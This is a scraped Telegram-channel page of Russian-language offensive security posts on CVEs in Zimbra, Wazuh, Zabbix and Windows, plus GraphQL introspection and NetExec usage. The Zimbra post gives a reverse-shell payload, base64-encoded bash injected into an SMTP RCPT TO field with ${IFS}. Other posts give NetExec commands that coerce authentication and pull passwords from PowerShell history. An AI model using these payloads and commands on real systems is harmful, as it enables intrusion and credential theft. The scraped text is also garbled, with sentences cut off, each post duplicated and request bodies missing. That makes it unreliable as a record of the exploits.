Укротитель змей
TGlist rating
0
0
TypePublic
Verification
Not verifiedTrust
Not trustedLocation
LanguageOther
Channel creation dateSep 21, 2023
Added to TGlist
Mar 06, 2025Linked chat
Latest posts in group "Укротитель змей"
Reposted from:
1N73LL1G3NC3
18.03.202516:33
CVE-2025-24071: NTLM Hash Leak via RAR/ZIP Extraction and .library-ms File
When a specially crafted .library-ms file containing an SMB path is compressed within a RAR/ZIP archive and subsequently extracted, Windows Explorer automatically parses the contents of this file due to its built-in indexing and preview mechanism. This behavior occurs because Windows Explorer processes certain file types automatically upon extraction to generate previews, thumbnails, or index metadata, even if the file is never explicitly opened or clicked by the user.
Blog: https://cti.monster/blog/2025/03/18/CVE-2025-24071.html
When a specially crafted .library-ms file containing an SMB path is compressed within a RAR/ZIP archive and subsequently extracted, Windows Explorer automatically parses the contents of this file due to its built-in indexing and preview mechanism. This behavior occurs because Windows Explorer processes certain file types automatically upon extraction to generate previews, thumbnails, or index metadata, even if the file is never explicitly opened or clicked by the user.
Blog: https://cti.monster/blog/2025/03/18/CVE-2025-24071.html
Reposted from:
Offensive Twitter
06.03.202522:28
😈 [ Mayfly @M4yFly ]
New Active Directory Mindmap v2025.03! 🚀
📖 Readable version:
🔗 https://orange-cyberdefense.github.io/ocd-mindmaps/img/mindmap_ad_dark_classic_2025.03.excalidraw.svg
🔧 Now fully generated from markdown files—way easier to update and maintain!
💡 Got improvements? PRs welcome! 👇
🔗 https://github.com/Orange-Cyberdefense/ocd-mindmaps/tree/main/excalimap/mindmap/ad
🐥 [ tweet ]
New Active Directory Mindmap v2025.03! 🚀
📖 Readable version:
🔗 https://orange-cyberdefense.github.io/ocd-mindmaps/img/mindmap_ad_dark_classic_2025.03.excalidraw.svg
🔧 Now fully generated from markdown files—way easier to update and maintain!
💡 Got improvements? PRs welcome! 👇
🔗 https://github.com/Orange-Cyberdefense/ocd-mindmaps/tree/main/excalimap/mindmap/ad
🐥 [ tweet ]
03.03.202515:41
Интересный диссер в Wazuh (CVE-2025-24016)
Для всех тех, кто тоже недавно подключился в интернет, как я, в
Такой запрос выполнит системную команду id на сервере. Такая десериализация редко встречается, так как обычно
Эксплуатация возможна двумя способами.
1)Через
Можно выполнить одиночные команды и получить ответ в теле
2)
Однако, есть важные моменты - это условия эксплуатации. Уязвимость срабатывает только при наличии доступа к
Для защиты необходимо обновить
PoC python
PoC burp
Для всех тех, кто тоже недавно подключился в интернет, как я, в
Wazuh была обнаружена критическая уязвимость, связанная с десериализацией JSON в API /security/user/authenticate/run_as. Проблема заключается в том, что метод as_wazuh_object в framework/wazuh/core/cluster/common.py обрабатывает пользовательский JSON без фильтрации, позволяя передать мета-поля class и args. Это не классический подход к эксплуатации, так как обычно десериализация ассоциируется с pickle или marshal, но здесь объект собирается напрямую из JSON. Такой запрос выполнит системную команду id на сервере. Такая десериализация редко встречается, так как обычно
JSON интерпретация ограничивается примитивами. Здесь же объект восстанавливается с возможностью динамического вызова.Эксплуатация возможна двумя способами.
1)Через
Burp Suite Можно выполнить одиночные команды и получить ответ в теле
HTTP-ответа. 2)
Python скрипт автоматизирует процесс, добавляя полезную нагрузку для прокидывания реверс шелла. Однако, есть важные моменты - это условия эксплуатации. Уязвимость срабатывает только при наличии доступа к
API с валидными учетными данными. Открытый порт не делает систему уязвимой сам по себе. Без авторизации сервер просто откажет в обработке запроса.Для защиты необходимо обновить
Wazuh до версии ≥ 4.9.1, ограничить доступ к API и следить за парольной политикой и утечкамиPoC python
PoC burp
28.01.202518:30
Интроспекционный запрос GraphQL, как вытащить всю схему API и что с этим делать
Все чаще и чаще замечаю, что в разработке используется технология
Для тестирования в
После выполнения такого запроса сервер вернет огромный
И бонус, существует динамический сканер GraphQLmap, работающий по принципу, схожему с
Установка и запуск
Все чаще и чаще замечаю, что в разработке используется технология
GraphQL для более гибкого и эффективного взаимодействия между клиентом и сервером. GraphQL позволяет отправлять единый запрос, объединяя несколько данных из разных источников, а также точно указывать, какие поля и типы данных необходимо получить, что оптимизирует загрузку и обработку информации. Но разработчики забывают о базовых уязвимостях, связанных с интроспекционным запросом (introspection query). Интроспекция в GraphQL - специальный механизм, позволяющий клиенту спросить у сервера информацию о самой схеме, например какие типы, поля, связи и даже описание доступных операций существуют в API. Благодаря этому запросу можно вытащить структуру всей схемы (включая названия типов, полей и их аргументов) и понять, какие объекты и операции доступны на сервере. Для тестирования в
Burp Suite уже есть специальные экстеншны для детального анализа таких запросов - GraphQL Raider и InQL - GraphQL Scanner. Благодаря им, мы как раз можем быстро составить интроспекционный запрос:query IntrospectionQuery {
__schema {
queryType {
name
}
mutationType {
name
}
subscriptionType {
name
}
types {
...FullType
}
directives {
name
description
args {
...InputValue
}
onOperation #Often needs to be deleted to run query
onFragment #Often needs to be deleted to run query
onField #Often needs to be deleted to run query
}
}
}
fragment FullType on __Type {
kind
name
description
fields(includeDeprecated: true) {
name
description
args {
...InputValue
}
type {
...TypeRef
}
isDeprecated
deprecationReason
}
inputFields {
...InputValue
}
interfaces {
...TypeRef
}
enumValues(includeDeprecated: true) {
name
description
isDeprecated
deprecationReason
}
possibleTypes {
...TypeRef
}
}
fragment InputValue on __InputValue {
name
description
type {
...TypeRef
}
defaultValue
}
fragment TypeRef on __Type {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
}
}
}
}
После выполнения такого запроса сервер вернет огромный
JSON ответ и непонятно как это анализировать, тут нам на помощь приходит мощный инструмент graphql-voyager или вариант попроще GraphQL Visualizer. Далее ответ сервера мы вставляем в эти приложения и получаем граф с подробной схемой всей API. И бонус, существует динамический сканер GraphQLmap, работающий по принципу, схожему с
SQLmap. Он не только облегчает формирование запросов, но и ищет типовые уязвимости. Установка и запуск
GraphQLmap:python -m venv .venv
source .venv/bin/activate
pip install --editable .
pip install -r requirements.txt
graphqlmap -u "http://172.17.0.1:5013/graphql" --proxy http://127.0.0.1:8080
Reposted from:
haxx
12.12.202413:01
🛠 Как-то незаметно прошел релиз NetExec 1.3.0, а туда тем временем добавили несколько интересных вещей.
Вывод инфы по доступным интерфейсам, так что поиск пивота стал гораздо приятнее.
Проверка на всякие Coerce штуки (PetitPotam, DFSCoerce, PrinterBug, MSEven, ShadowCoerce). Подробнее тут
Энум SCCM через LDAP (RECON-1) . Подробнее тут
Извлечение паролей из истории команд PowerShell
Статус Bitlocker по дискам
В общем, есть с чем поиграться. Более подробно можно посмотреть тут или тут
Вывод инфы по доступным интерфейсам, так что поиск пивота стал гораздо приятнее.
nxc smb 192.168.13.37 -u 'USERNAME' -p 'LOLKEKPOHEK' --interfacesПроверка на всякие Coerce штуки (PetitPotam, DFSCoerce, PrinterBug, MSEven, ShadowCoerce). Подробнее тут
nxc smb 192.168.13.37 -u 'USERNAME' -p 'LOLKEKPOHEK' -M coerce_plusЭнум SCCM через LDAP (RECON-1) . Подробнее тут
nxc ldap 192.168.13.37 -u 'USERNAME' -p 'LOLKEKPOHEK' -M sccm -o REC_RESOLVE=TRUEИзвлечение паролей из истории команд PowerShell
nxc smb 192.168.13.37 -u 'USERNAME' -p 'LOLKEKPOHEK' -M powershell_history -o export=TrueСтатус Bitlocker по дискам
nxc smb 192.168.13.37 -u 'USERNAME' -p 'LOLKEKPOHEK' -M bitlockerВ общем, есть с чем поиграться. Более подробно можно посмотреть тут или тут
04.12.202408:48
CVE-2024-42327 в Zabbix
1 декабря наткнулся на уязвимость CVE-2024-42327 и решил ее изучить, прочитав пару постов, было сказано, что злоумышленник может внедрять произвольные
CVE-2024-42327 - это крит уязвимость (CVSS 9.9), связанная с
Результаты запроса включают:
Имя пользователя (username),
Имя (name) и фамилию (surname),
Идентификатор пользователя (userid),
Хэш пароля (passwd)
Внутри исходника присутствует аргумент
в PoC запускается скрипт cve-2024-42327.py и в нем присутствуют важные этапы.
Первый этап: Аутентификация через API
Метод
После этого сервер возвращает токен
Второй этап: Перебор идентификаторов пользователей. После получения токена, скрипт вызывает метод
В ответе возвращаются данные с хэшированным паролем
Чтобы провернуть эту схему, нужно иметь доступ к
И учетка с минимальными правами, которая может дернуть метод
Уязвимые версии:
PoC
1 декабря наткнулся на уязвимость CVE-2024-42327 и решил ее изучить, прочитав пару постов, было сказано, что злоумышленник может внедрять произвольные
SQL запросы. Нашел PoC и немного удивился, провел ресерч и ничего общего с SQLi не увидел. Давайте разберемся, о чем же эта бага. CVE-2024-42327 - это крит уязвимость (CVSS 9.9), связанная с
JSON-RPC API Zabbix. Она позволяет хакеру с минимальными правами (пользователь с доступом к API) извлекать конфиденциальные данные о других учетных записях, включая имена, фамилии, идентификаторы и хэшированные пароли. Проблема кроется в неправильной проверке авторизации и прав доступа, а не в манипуляции SQL запросами. Уязвимость базируется на логической ошибке в реализации API. Метод user.get предоставляет доступ к данным, которые не должны быть видны пользователю с минимальными правами. Злоумышленник использует легитимные методы API, такие как user.login и user.get. Запросы передаются в формате JSON, и сервер возвращает ответ.Результаты запроса включают:
Имя пользователя (username),
Имя (name) и фамилию (surname),
Идентификатор пользователя (userid),
Хэш пароля (passwd)
Внутри исходника присутствует аргумент
selectRole в запросе API и может создать впечатление работы с SQL запросами, так как он содержит поля, такие как roleid и u.passwd. Однако это параметры API, а не запросы к БД.в PoC запускается скрипт cve-2024-42327.py и в нем присутствуют важные этапы.
Первый этап: Аутентификация через API
Метод
user.login используется для получения токена сессии, необходимого для выполнения запросов.{После этого сервер возвращает токен
{Второй этап: Перебор идентификаторов пользователей. После получения токена, скрипт вызывает метод
user.get, перебирай ID пользователей{В ответе возвращаются данные с хэшированным паролем
{Чтобы провернуть эту схему, нужно иметь доступ к
JSON-RPC API Zabbix, чаще всего у него такой эндпоинт.http://zabbix/api_jsonrpc.php
И учетка с минимальными правами, которая может дернуть метод
user.login.Уязвимые версии:
Zabbix 6.0.0–6.0.31
Zabbix 6.4.0–6.4.16
Zabbix 7.0.0.
cve-2024-42327.py -u http://zabbix/api_jsonrpc.php -n Vanya -p Qwerty123PoC
28.11.202416:23
Ну что, привет дорогие, неподкупные читатели моих редко выходящих постов!
Да, я немного пропал. За это время накопилось столько мыслей и материалов, посты возвращается с новой силой)
И первое, что хочется сказать - огромное спасибо вам всем! Недавно мы перевалили за 200 человек, и для меня это не просто цифра. Это 200 людей, которые разделяют интерес к тому, о чем я пишу. Ваше внимание и поддержка вдохновляют, будущий контент будет становится только интереснее и полезнее
Я решил, что нужно отметить это событие небольшим розыгрышем. Чтобы долго не ждать, результаты будут уже в эту субботу ❤️
Да, я немного пропал. За это время накопилось столько мыслей и материалов, посты возвращается с новой силой)
И первое, что хочется сказать - огромное спасибо вам всем! Недавно мы перевалили за 200 человек, и для меня это не просто цифра. Это 200 людей, которые разделяют интерес к тому, о чем я пишу. Ваше внимание и поддержка вдохновляют, будущий контент будет становится только интереснее и полезнее
Я решил, что нужно отметить это событие небольшим розыгрышем. Чтобы долго не ждать, результаты будут уже в эту субботу ❤️
Reposted from:
Ralf Hacker Channel
16.10.202418:03
Так, новая техника инъекции в процессы - Early Cascade Injection.
Ну и ресерч достаточно подробный)
https://www.outflank.nl/blog/2024/10/15/introducing-early-cascade-injection-from-windows-process-creation-to-stealthy-injection/
#redteam #maldev #bypass
Ну и ресерч достаточно подробный)
https://www.outflank.nl/blog/2024/10/15/introducing-early-cascade-injection-from-windows-process-creation-to-stealthy-injection/
#redteam #maldev #bypass
05.10.202414:03
CVE-2024-45519 — уязвимость в сервисе
Наш эксплойт состоит из нескольких частей. Сначала создается класс
Сама команда передается в поле RCPT TO в виде
Теперь соберем все вместе и получим:
Мы устанавливаем соединение с уязвимым
Интересная часть эксплуатации заключается в том, что для
Условия эксплуатации: Доступ к
PoC
postjournal Zimbra Collaboration Suite, которая позволяет выполнить произвольные команды на сервере. Уязвимость связана с неправильной обработкой входных данных в SMTP-сообщениях. Версии Zimbra, подверженные этой уязвимости, включают все версии до 9.0.0 Patch 41, а также 8.8.15 Patch 46. Баг заключается в том, что функция popen(), использующаяся в версии сервиса, передает пользовательские данные напрямую в командную строку без фильтрации. Это позволяет вставлять произвольные команды в поле получателя (RCPT TO) SMTP-сообщений и исполнять их.Наш эксплойт состоит из нескольких частей. Сначала создается класс
SMTPExploit, который отвечает за установку соединения с уязвимым SMTP-сервером и отправку команд. Важной частью является генерация вредоносного email-адреса получателя (RCPT TO), в котором инжектится команда для выполнения на сервере. Этот email-адрес генерируется следующим образом. Создается обратный шелл с помощью /bin/bash, который подключается к атакующему устройству на указанный IP-адрес и порт через TCP. Затем команда кодируется в base64 и используется в строке инъекцииpayload = f"echo${{IFS}}{base64_revshell}|base64${{IFS}}-d|bash"Сама команда передается в поле RCPT TO в виде
self.send_smtp_command(f"RCPT TO: <{self.generate_injected_rcpt_to()}>")Теперь соберем все вместе и получим:
Мы устанавливаем соединение с уязвимым
SMTP-сервером, используя стандартные SMTP-команды. Это делается с помощью функции send_smtp_command, которая отправляет такие команды, как EHLO, MAIL FROM, и в итоге – вредоносный RCPT TO с инъекцией. После отправки команд отправляется тело сообщения с текстом "Test message", чтобы завершить передачу данных и дело в шляпе, мы получаем Reverse Shell. Интересная часть эксплуатации заключается в том, что для
инъекции используется синтаксис ${IFS}, что позволяет избежать проблем с пробелами и передать команду в обработчик shell. Это помогает обойти базовые защиты, которые могут блокировать прямую передачу вредоносных символов в SMTP-сообщениях.Условия эксплуатации: Доступ к
SMTP-серверу (обычно это 25 порт) , уязвимая версия Zimbra и доступ к функционалу для отправки сообщенийPoC
python exploit.py 
Records
07.04.202523:59
245Subscribers03.03.202523:59
0Citation index11.02.202516:10
56Average views per post04.03.202516:10
56Average views per ad post04.03.202516:10
23.21%ER04.03.202516:10
24.78%ERRLog in to unlock more functionality.